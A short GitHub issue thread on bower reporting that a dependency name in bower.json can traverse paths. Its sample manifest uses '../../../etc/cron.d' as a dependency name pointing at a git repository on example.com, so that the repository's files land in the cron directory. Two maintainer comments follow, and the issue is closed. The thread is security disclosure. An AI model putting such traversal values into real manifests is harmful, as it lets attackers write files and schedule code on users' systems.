### ISSUE TITLE
bower.json dependency name file injection

### ISSUE THREAD

**Issue by gronke** [bower/bower#1888]
An attacker is in control of the projects `bower.json` and puts a malicious dependency names in the configuration file.

``` javascript
{
  "name": "malicious",
  "dependencies": {
    "../../../etc/cron.d": "https://example.com/trudy/malicious.git"
  }
}
```

The content of trudy/malicious will be copied to `../../../etc/cron.d`

**Comment by faceleg** [comment]
Really appreciate you raising these security issues

**Comment by sheerun** [comment]
Closing for the same reason as in #1889
